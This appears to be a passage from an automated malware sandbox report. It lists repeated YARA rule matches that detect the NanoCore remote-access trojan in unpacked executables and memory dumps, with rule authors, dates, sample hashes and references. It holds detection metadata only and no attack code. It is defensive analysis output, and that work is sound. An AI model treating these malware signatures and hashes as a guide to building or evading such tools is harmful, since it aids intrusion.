    Source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000019.00000002.391670186.0000000003411000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.383169195.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383169195.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.385532540.00000000010C3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.385532540.00000000010C3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000019.00000002.391832360.0000000004419000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.386511135.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.386511135.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.383645453.000000000485B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383645453.000000000485B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.386616181.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.386616181.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.383202245.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383202245.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.383407849.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383407849.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001E.00000002.406011428.0000000000D02000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001E.00000002.406011428.0000000000D02000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
